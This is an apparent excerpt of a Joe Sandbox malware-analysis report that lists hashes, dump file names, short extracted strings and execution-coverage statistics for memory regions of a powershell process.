                                                                      • Instruction ID: 493d4b4eb25658ed12e46be5b0078a62aa8145950b3f5036ae97c5d01dd1952d
                                                                      • Opcode Fuzzy Hash: a7afe10f00b0a1e56ffce1300981033ceb89479f283a54a7818307e8f7d21205
                                                                      • Instruction Fuzzy Hash: AA31B778750204AFD70497F8C9A5BAF7AA7EFC4344F208415E9016F391CE769C828BE2
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: de8f1b7b3451bd075d0ec5f517a2a7f8bf25d529dfa9ae730773d32bd1aac3f9
                                                                      • Instruction ID: ea40ae918a35ce9bb2f949aeb130a5ab5108c6a52f63faa0f4fb68a56a05c93a
                                                                      • Opcode Fuzzy Hash: de8f1b7b3451bd075d0ec5f517a2a7f8bf25d529dfa9ae730773d32bd1aac3f9
                                                                      • Instruction Fuzzy Hash: 5D2103B27002109BC72156FC98526EFB7929BD2324B11CC6BCA429B356CE329D42C3B2
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 58c1ba19614dbb8f812be84d691f26009c49c0e8ff9c5534320b6ab2baa0a5b2
                                                                      • Instruction ID: 1e6939350fd1bb028e4fb1dd39de365cc9e2393a6746971baead3c8572bfb2c9
                                                                      • Opcode Fuzzy Hash: 58c1ba19614dbb8f812be84d691f26009c49c0e8ff9c5534320b6ab2baa0a5b2
                                                                      • Instruction Fuzzy Hash: 89215AB53143169BD73459FA48507BBB6CA9BD870AF20883B9506CB3E1CE75CC418371
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 13fe6581c78b61144a928b7a3dc23014016dbadd7702dcce91b865fa0931b669
                                                                      • Instruction ID: d023e3a983c6dddff74ad26e22588b32046507a35f0a3b4bb006959c265c6b37
                                                                      • Opcode Fuzzy Hash: 13fe6581c78b61144a928b7a3dc23014016dbadd7702dcce91b865fa0931b669
                                                                      • Instruction Fuzzy Hash: 602128B53083916BD7300AF948507F77FA65FA6315F2448ABD585DB2E3CA659C80C372
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2375162143.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_4740000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3467e8d24e3da7cdcb502f2d50aadd2c364ebecf3dd6e2d70613d430e4dd860e
                                                                      • Instruction ID: 1a3ec519e17c9abfbd2ed71618a66bd61ec9b16569b2ab9e863f2fb0a372da70
                                                                      • Opcode Fuzzy Hash: 3467e8d24e3da7cdcb502f2d50aadd2c364ebecf3dd6e2d70613d430e4dd860e
                                                                      • Instruction Fuzzy Hash: A7317174A052568FCB01DFACC690A99BFB4FF89310F154496D848EB3A2D334ED45CBA5
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 773f32bbc3dd4a98a91727d54c04b47cd6d2e21f6593dc62e056acf30ae77cb3
                                                                      • Instruction ID: 8c7ff69a0842c67f7a6715d11d41ede404c587ea88d55a13869c78bee3213ca7
                                                                      • Opcode Fuzzy Hash: 773f32bbc3dd4a98a91727d54c04b47cd6d2e21f6593dc62e056acf30ae77cb3
                                                                      • Instruction Fuzzy Hash: E60124363002168BC73459AAA4002EBB79ADFC1263F14843BD885C6760CA32CE05C7B0
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2375162143.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_4740000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a70837e0ce94031ec887bc53b471b6ed39e44580e02f9d29c7f667eee655e1f5
                                                                      • Instruction ID: 96027e4e885093463d49296c7ff33417b4a691ba25be76dea74798758fae96d4
                                                                      • Opcode Fuzzy Hash: a70837e0ce94031ec887bc53b471b6ed39e44580e02f9d29c7f667eee655e1f5
                                                                      • Instruction Fuzzy Hash: A6118330D00159DBEF24DAA8D5987FCB772BF9532EF14142AC011B62A0EB7468C9CB15
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2375162143.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_4740000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 761d6392bc19788822b9a1838449537fd971be97544b5fef8dc5c1ddd3fe2c69
                                                                      • Instruction ID: d7ea15579c351088e104b5819cafde74a5c14bf167c34d1df73ee244bae72988
                                                                      • Opcode Fuzzy Hash: 761d6392bc19788822b9a1838449537fd971be97544b5fef8dc5c1ddd3fe2c69
                                                                      • Instruction Fuzzy Hash: D411D434A44209AFDB45CBA8D484A9DFBB2BF88314F24C159E405AB365C775E986CB90
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2374754514.000000000462D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0462D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_462d000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d62381f6a707aff539fa1c9168d572a0323f0fcc334f552a19a0c56c56421d9a
                                                                      • Instruction ID: e70106ace81484b4e1bd54b2aaa2ecabeabda4a22c6eba6d670df011b6f2bc69
                                                                      • Opcode Fuzzy Hash: d62381f6a707aff539fa1c9168d572a0323f0fcc334f552a19a0c56c56421d9a
                                                                      • Instruction Fuzzy Hash: 56012B31104710BEE7208E15DE84B67FF9CEF55360F18C429ED484B296E27DA842CEB1
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2374754514.000000000462D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0462D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_462d000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4656e1470c188b8d7e8c8c33ec1ebe53455fa2b1122a4acbe918c2b0726adfa5
                                                                      • Instruction ID: 174541421c40a1c6feb33ac37b4a31f7e8e4b35d999c9636358a8d735f04abf3
                                                                      • Opcode Fuzzy Hash: 4656e1470c188b8d7e8c8c33ec1ebe53455fa2b1122a4acbe918c2b0726adfa5
                                                                      • Instruction Fuzzy Hash: 37F0F671004354AEE7108E16DD84B63FF98EF56734F18C55AED484F396C279A840CAB1
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2375162143.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_4740000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cf4b140461cb74f60a588e8429a1c07cd80453a71f8e705cc5d86677088cdc93
                                                                      • Instruction ID: c1c39c0c23e5be5a97bb1a5eb41f3e8797535e1c688ec4049e05bf6d3565d9ac
                                                                      • Opcode Fuzzy Hash: cf4b140461cb74f60a588e8429a1c07cd80453a71f8e705cc5d86677088cdc93
                                                                      • Instruction Fuzzy Hash: F3014F71A00109DFCB14CF98D9809ADF7B2FF88324B258668D419A7695C732EC51CB94
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 98dfdf89232efdcb3d1f0d12588e616c767c9f38d90750e975fcd103f1d775e9
                                                                      • Instruction ID: 94168b420ddb6595bf0a16598441d86a9254aeddc8978b2a73ff9f6ac2343c6c
                                                                      • Opcode Fuzzy Hash: 98dfdf89232efdcb3d1f0d12588e616c767c9f38d90750e975fcd103f1d775e9
                                                                      • Instruction Fuzzy Hash: 94E0ED756093818FD72A8F59C455A91BBB2EB82205F1DC0DBE4488F2A7C736DC46C761
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2374754514.000000000462D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0462D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_462d000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a82baa488e4580f92a0b51d48c1c0e8bce849ea93501d3bdab38cf8b0a560b63
                                                                      • Instruction ID: beeb2035ea0f0d003152cbcb7fdd4df46891816a0d9fc0eb3c132087600e5537
                                                                      • Opcode Fuzzy Hash: a82baa488e4580f92a0b51d48c1c0e8bce849ea93501d3bdab38cf8b0a560b63
                                                                      • Instruction Fuzzy Hash: DD21F472600640EFDB058F14DAC4F26BFA5FB88314F24C569EA090A316D33AE416DFA1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'jq$4'jq$4'jq$4'jq$tPjq$tPjq$t~}q$$jq$$jq$$jq$$jq
                                                                      • API String ID: 0-2100231793
                                                                      • Opcode ID: 399c3f511617c24a901d0df560a09854415d2807ef51dc99bf83d1a6335346ed
                                                                      • Instruction ID: 31e032fdea6c9e52280ac78a3538e3b505d822010f7f7fc14c30e1b034196c0b
                                                                      • Opcode Fuzzy Hash: 399c3f511617c24a901d0df560a09854415d2807ef51dc99bf83d1a6335346ed
                                                                      • Instruction Fuzzy Hash: 75E135B1B002159FCB249AA988107EBBBE6FFC5310F14846BD9059B355DB71DC46C7B2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'jq$4'jq$4'jq$4'jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                                                      • API String ID: 0-131745132
                                                                      • Opcode ID: 76db3b5d93915ed4b479dee52159c003f422e8ee99277428813bb1056c733edd
                                                                      • Instruction ID: 2e804a64f35078c683d7ddc6d24c19834b5cf678bfabbf56bc51b937b9f99b49
                                                                      • Opcode Fuzzy Hash: 76db3b5d93915ed4b479dee52159c003f422e8ee99277428813bb1056c733edd
                                                                      • Instruction Fuzzy Hash: CDC1D4B170420ADFDB358E69D4C46EBBBA6AF86221F14C46BD8458B351DB35CD41C7B0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'jq$4'jq$4'jq$4'jq$$jq$$jq$$jq$$jq$$jq$$jq
                                                                      • API String ID: 0-2815571254
                                                                      • Opcode ID: 00e63e1e70cc281576daf11f167eb734f505d4220e1134c8f06a558421fdd937
                                                                      • Instruction ID: 26ecb508a416f522695d4a74a3e179c2b730707946edea724305788324cc4032
                                                                      • Opcode Fuzzy Hash: 00e63e1e70cc281576daf11f167eb734f505d4220e1134c8f06a558421fdd937
                                                                      • Instruction Fuzzy Hash: 27A144B17143168FCB355A6998102FBBBA6FF86210F14896BD805DB3A1DBB5CC42C3B1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'jq$4'jq$d%pq$d%pq$d%pq$d%pq$tPjq$tPjq$$jq
                                                                      • API String ID: 0-1806847741
                                                                      • Opcode ID: f2c3cfaf0b397040bd63e51ad3b0e29992744fd19b02a2b652a917e72891094a
                                                                      • Instruction ID: c092d6082dfabc6820cad38857adecd63f2caecc110de64ef6c539e65304f749
                                                                      • Opcode Fuzzy Hash: f2c3cfaf0b397040bd63e51ad3b0e29992744fd19b02a2b652a917e72891094a
                                                                      • Instruction Fuzzy Hash: 2471D4B1F54216DFCB348E64C8507EABBA2AF88314F1488E6D8058B395DB35DC41CB71
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'jq$tPjq$tPjq$$jq$(pq$(pq$(pq
                                                                      • API String ID: 0-2774477165
                                                                      • Opcode ID: bf194b6c93983cfaa2d2926d99ce078cc7f1c7ab8ea33f207837465a8df26908
                                                                      • Instruction ID: 88847363e5dbc883704cf418545f38df615b981cc4084b97af88c9e0c1e01123
                                                                      • Opcode Fuzzy Hash: bf194b6c93983cfaa2d2926d99ce078cc7f1c7ab8ea33f207837465a8df26908
                                                                      • Instruction Fuzzy Hash: ED716CB0F052069FDB388E54C540BEAB7A6AF89311F18849BE805AB395C775DD41CFB1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $jq$$jq$$jq$$jq$$jq$$jq
                                                                      • API String ID: 0-3356825164
                                                                      • Opcode ID: 65a5a36fc40c12b2bfe2bd9ee398ea6a824b2c10ef0cde62e691dcb0b2b8d523
                                                                      • Instruction ID: 809209352297a18f67b3cd346209e66d2ea041587e4759c7792aed559ad8bb8f
                                                                      • Opcode Fuzzy Hash: 65a5a36fc40c12b2bfe2bd9ee398ea6a824b2c10ef0cde62e691dcb0b2b8d523
                                                                      • Instruction Fuzzy Hash: DF6116B1714346CFCB315AA994102EBBBAE9FD2210B18847BD945CB392DE36DC45C7B1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (fl$(fl$(fl$(fl$4'jq$4'jq
                                                                      • API String ID: 0-1937588454
                                                                      • Opcode ID: 0ed9ebb190ecd60730fb6e89cc21a292925836793b99a66e8a8f1d7f122eff88
                                                                      • Instruction ID: d811f826c46685d88aca96a1d33815b803a1a799d10f00c2009dfebf9c4c9380
                                                                      • Opcode Fuzzy Hash: 0ed9ebb190ecd60730fb6e89cc21a292925836793b99a66e8a8f1d7f122eff88
                                                                      • Instruction Fuzzy Hash: 9C6198B0B01215DFD724CBA8C551AEBBBE2AFC9310F54846AD8059B355DB35EC42CBA1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'jq$tPjq$$jq$$jq$$jq
                                                                      • API String ID: 0-728028659
                                                                      • Opcode ID: e0772f6981e7d2a92475843c46bb9b8321ccd7494720835cecfbcc789512bcd1
                                                                      • Instruction ID: 3247480e3fcd23c92733ca5cd0ba9551bb89c598924d47c3c4698a47523f68e1
                                                                      • Opcode Fuzzy Hash: e0772f6981e7d2a92475843c46bb9b8321ccd7494720835cecfbcc789512bcd1
                                                                      • Instruction Fuzzy Hash: 1561AFB0650226DFDB388E55C5447EB77A2ABC5311F18886BE8015B391D771EC85CBB1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'jq$4'jq$$jq$$jq$$jq
                                                                      • API String ID: 0-103809679
                                                                      • Opcode ID: eeba2a7c316e6743b26954106c272d73fc119606e5c6e84f19582886efaf0116
                                                                      • Instruction ID: d5a8af71b3288d658d4de253df90210008dd86abf371b3794e534c8775848958
                                                                      • Opcode Fuzzy Hash: eeba2a7c316e6743b26954106c272d73fc119606e5c6e84f19582886efaf0116
                                                                      • Instruction Fuzzy Hash: 83412AB6F043168FCB344A6998506E7B7A5EF99310B2444FBC84A87285DA39CC12CF71
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'jq$d%pq$d%pq$d%pq$tPjq
                                                                      • API String ID: 0-3681948632
                                                                      • Opcode ID: 3e17a762c8360b9dcef27d57c09f3059a4d8ba8230f55fd6105c5bb10bec1fd9
                                                                      • Instruction ID: 23f19fb5f8a8414b2faa87d8572ed6bfff32b01ab387f51e48e6d64f37560f3a
                                                                      • Opcode Fuzzy Hash: 3e17a762c8360b9dcef27d57c09f3059a4d8ba8230f55fd6105c5bb10bec1fd9
                                                                      • Instruction Fuzzy Hash: 933181B0F502159FCB24DF58C484AEABBE2AF88714F2585D6E805AB354C632ED41CFA1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (ojq$(ojq$(ojq$(ojq
                                                                      • API String ID: 0-3475039101
                                                                      • Opcode ID: 7800cdae475f6d64a180ada669bdc12732d189f17d5b9fdb8eb8e110a2274d6a
                                                                      • Instruction ID: 3dc335edb423e1280e7d3affca17445e86a7fd3c64221416220788b78a982174
                                                                      • Opcode Fuzzy Hash: 7800cdae475f6d64a180ada669bdc12732d189f17d5b9fdb8eb8e110a2274d6a
                                                                      • Instruction Fuzzy Hash: 60F1E2B1704246DFCB248FA8D8947EBBBA6EF81311F1484ABE9158B291CB35DC51C7B1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'jq$4'jq$4'jq$4'jq
                                                                      • API String ID: 0-4000621977
                                                                      • Opcode ID: b9a017431894542f7dd159504085a148ab74f56d6dea4b415a0409c64f657458
                                                                      • Instruction ID: a30d205d87befd66817f9882760d1f5555735ffbd34abfdbced30faa046913c3
                                                                      • Opcode Fuzzy Hash: b9a017431894542f7dd159504085a148ab74f56d6dea4b415a0409c64f657458
                                                                      • Instruction Fuzzy Hash: 308136B5704206DFCB354AA994112F7BBF6AFC2210F24846BC615CB352DB35AD86C7B2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'jq$4'jq$XYl$XYl
                                                                      • API String ID: 0-4033020852
                                                                      • Opcode ID: ffee9e3bad013c703b40668c856d45bbe79ff75395642fced6f7bd825e9cffeb
                                                                      • Instruction ID: ae21f7d5f4d20d2092d689156b63f4719545d84e216e2bfe0046e4866d903d70
                                                                      • Opcode Fuzzy Hash: ffee9e3bad013c703b40668c856d45bbe79ff75395642fced6f7bd825e9cffeb
                                                                      • Instruction Fuzzy Hash: DC510AB0B403059FCB398BA885546EB7BE6AFC5212B1484A7D9018F376DA31CD49C7B2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (fl$(fl$(fl$(fl
                                                                      • API String ID: 0-1133856015
                                                                      • Opcode ID: 4cba94be0e591876b3c290f6c08b35b50b5f61cb382277deb1711d3e61158be0
                                                                      • Instruction ID: 1653e7c04acf9b6df06fb6cf7364af3d9ec4ff0133203b64b617551a5c23f57c
                                                                      • Opcode Fuzzy Hash: 4cba94be0e591876b3c290f6c08b35b50b5f61cb382277deb1711d3e61158be0
                                                                      • Instruction Fuzzy Hash: E75182B4A01105DFD724CF98C551AEABBFAEF95310F15C56AD8059B315CB32DC82CBA1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: XRoq$XRoq$tPjq$$jq
                                                                      • API String ID: 0-3567977740
                                                                      • Opcode ID: ecc77d6e4346d52c056683f32e178467c3c787d3700ae308932d6415b6c640e7
                                                                      • Instruction ID: d254238bad90d12d0283135bbdd0f6b78087a55545e31dffdcc80f07886cea45
                                                                      • Opcode Fuzzy Hash: ecc77d6e4346d52c056683f32e178467c3c787d3700ae308932d6415b6c640e7
                                                                      • Instruction Fuzzy Hash: 32416DB5A00225DFCB348E59C144AEAB7F2ABC9324F69C4ABE8155B351C731DD41CBB0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $jq$$jq$$jq$$jq
                                                                      • API String ID: 0-2428501249
                                                                      • Opcode ID: eb836306422101f01a40e7667cc264babd4e8b115cf65a15ffdfb98194ff4bb5
                                                                      • Instruction ID: c0fbf5f08002de022be38e9d8c09b70cc58e6c7c03e1beaa7fcfbcb60bf5c109
                                                                      • Opcode Fuzzy Hash: eb836306422101f01a40e7667cc264babd4e8b115cf65a15ffdfb98194ff4bb5
                                                                      • Instruction Fuzzy Hash: 21210AB53543065FDB3499BA88807E776DADBC1716F24883BA909C73A2DD75EC428331
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $jq$$jq$$jq$$jq
                                                                      • API String ID: 0-2428501249
                                                                      • Opcode ID: 313f231e4d92fba9f92d3e0cf9e836fcbb761d4008c611eee9cc4206c6a27387
                                                                      • Instruction ID: ff0f2f79871bd57918311e55251b46be69eba146ab0d6c719725ee088024db69
                                                                      • Opcode Fuzzy Hash: 313f231e4d92fba9f92d3e0cf9e836fcbb761d4008c611eee9cc4206c6a27387
                                                                      • Instruction Fuzzy Hash: 4221AEB6A0020ADFDB309E95C5402EBB7BEABA5211F18446BD908D7341D739DC82CBF1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'jq$4'jq$$jq$$jq
                                                                      • API String ID: 0-1496060811
                                                                      • Opcode ID: dcbfb77e72daab65b6d0b96b9071cf1feb157a42a3a0d48a95a4f0d8e85d3a06
                                                                      • Instruction ID: 84b264a4e3ca2e2bfb3e44542462087a913ca8861e924698e326da4db1dcf813
                                                                      • Opcode Fuzzy Hash: dcbfb77e72daab65b6d0b96b9071cf1feb157a42a3a0d48a95a4f0d8e85d3a06
                                                                      • Instruction Fuzzy Hash: A501F7713493894FC73A066918301E37FB69FC365032A049BC485DF297CA248C4BC3B6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'jq$4'jq$$jq$$jq
                                                                      • API String ID: 0-1496060811
                                                                      • Opcode ID: 248f2c92957ac03e4ca47a7952d202425dff6aea052b19c218db4da77eac1b53
                                                                      • Instruction ID: 62dcd920569e059a4bbeaa334fb6ad4029fc2b9815bf3133b70d8e700239e53d
                                                                      • Opcode Fuzzy Hash: 248f2c92957ac03e4ca47a7952d202425dff6aea052b19c218db4da77eac1b53
                                                                      • Instruction Fuzzy Hash: 4DF028B1704249CFCB3A4A6894102EBFB62BF8E150F35446BC8085A395CE31CC22C762
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2410379270.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_74b0000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'jq$4'jq$XYl$XYl
                                                                      • API String ID: 0-4033020852
                                                                      • Opcode ID: 0caf622efa3fb8da859ee5e6c99b8d12a0ee5cbb3be65b7af1123044080a72b5
                                                                      • Instruction ID: 5e66d023cd5a403995a0265f7fa32418bbed11774a8129a39fab271a2578a4b0
                                                                      • Opcode Fuzzy Hash: 0caf622efa3fb8da859ee5e6c99b8d12a0ee5cbb3be65b7af1123044080a72b5
                                                                      • Instruction Fuzzy Hash: A3F028F5B441469FC72446A89810BF6BBA7EFC2660F20445BC901CF362DA318C16C372

                                                                      Execution Graph

                                                                      Execution Coverage:1.9%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:2.7%
                                                                      Total number of Nodes:1658
                                                                      Total number of Limit Nodes:1
